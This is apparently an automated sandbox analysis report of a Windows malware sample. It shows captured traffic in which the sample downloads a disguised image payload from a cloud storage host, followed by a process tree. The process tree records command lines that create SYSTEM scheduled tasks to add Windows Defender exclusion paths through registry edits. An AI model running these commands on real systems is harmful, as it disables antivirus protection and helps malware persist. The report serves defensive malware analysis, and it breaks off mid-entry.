2025-01-02 11:15:36 UTC	4096	IN	Data Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3 Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa\|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49997	118.178.60.9	443	6196	C:\Users\user\Documents\sgH8Ps.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:15:47 UTC	115	OUT	GET /FOM-53.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:15:47 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:15:47 GMT Content-Type: image/jpeg Content-Length: 366410 Connection: close x-oss-request-id: 67767563FE87B7303974F8E2 Accept-Ranges: bytes ETag: "DA1D5EB665D3AAD523BE59415E6449ED" Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 5641369857548672686 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q== x-oss-server-time: 3
2025-01-02 11:15:47 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-02 11:15:47 UTC	4096	IN	Data Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 Data Ascii: ```````````````````````````````````````````````````````````````
2025-01-02 11:15:47 UTC	4096	IN	Data Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5 Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
2025-01-02 11:15:47 UTC	4096	IN	Data Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
2025-01-02 11:15:47 UTC	4096	IN	Data Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5 Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
2025-01-02 11:15:47 UTC	4096	IN	Data Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20 Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m\|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
2025-01-02 11:15:48 UTC	4096	IN	Data Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
2025-01-02 11:15:48 UTC	4096	IN	Data Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
2025-01-02 11:15:48 UTC	4096	IN	Data Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d Data Ascii: jebp````]bp`At``_l+-D^__H\|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
2025-01-02 11:15:48 UTC	4096	IN	Data Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32 Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka\|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2

Target ID:	0
Start time:	06:13:18
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\45631.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\45631.exe"
Imagebase:	0x140000000
File size:	31'614'976 bytes
MD5 hash:	71FB431D4793BB51CE762DC5D719A730
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:14:22
Start date:	02/01/2025
Path:	C:\Users\user\Documents\sgH8Ps.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\sgH8Ps.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:15:01
Start date:	02/01/2025
Path:	C:\Users\user\Documents\sgH8Ps.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\sgH8Ps.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	06:15:12
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7b6450000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:15:12
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:15:12
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:15:12
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:15:12
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7b6450000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:15:12
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:15:12
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:15:12
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff779400000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:15:13
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7b6450000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:15:13
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:15:13
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:15:14
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	06:15:14
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7b6450000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	06:15:14
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	06:15:14
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	06:15:14
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff779400000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	06:15:14
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7b6450000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	06:15:14
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	06:15:15
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	06:15:15
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff604930000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
